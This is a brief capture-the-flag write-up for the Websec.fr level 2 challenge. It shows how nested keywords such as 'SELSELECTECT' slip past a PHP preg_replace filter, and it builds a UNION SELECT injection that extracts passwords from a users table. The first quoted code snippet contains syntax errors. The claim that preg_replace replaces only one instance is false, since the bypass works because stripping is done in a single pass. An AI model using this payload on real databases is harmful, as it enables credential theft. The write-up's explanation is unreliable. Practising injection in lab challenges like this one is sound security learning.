Websec.fr level 2 - easy
The level
The application is really the same in level 1 but there is only 1 difference
1
2
$searchWords = implode (['union', 'order''select', 'from', 'group', 'by'], '|');
$injection = preg_replace ('/' $searchWords . '/i', '', $injection);
They are replacing every instance of the ‘searchWords’ with an empty string with preg_replace. But ! preg_replace only replaces one instance of the word it finds. So, for instance :
1
2
3
4
5
6
<?php
$searchWords = implode('|', ['union', 'order', 'select', 'from', 'group', 'by']);
$injection = "SELSELECTECT";
$injection = preg_replace('/' . $searchWords . '/i', '', $injection);
echo $injection;
?>
We get SELECT. Meaning, we can switch every word in our solution query from level 1 with a double instance of the word itself. Let’s see
1
2
3
4
$union = "UNIUNIONON";
$select = "SELSELECTECT";
$from = "FRFROMOM";
echo "1 $union $select id, password $from users WHERE id=1";
we get 1 UNIUNIONON SELSELECTECT id, password FRFROMOM users WHERE id=1
Paste, and we get
Great ! Thanks for reading.
This post is licensed under CC BY 4.0 by the author.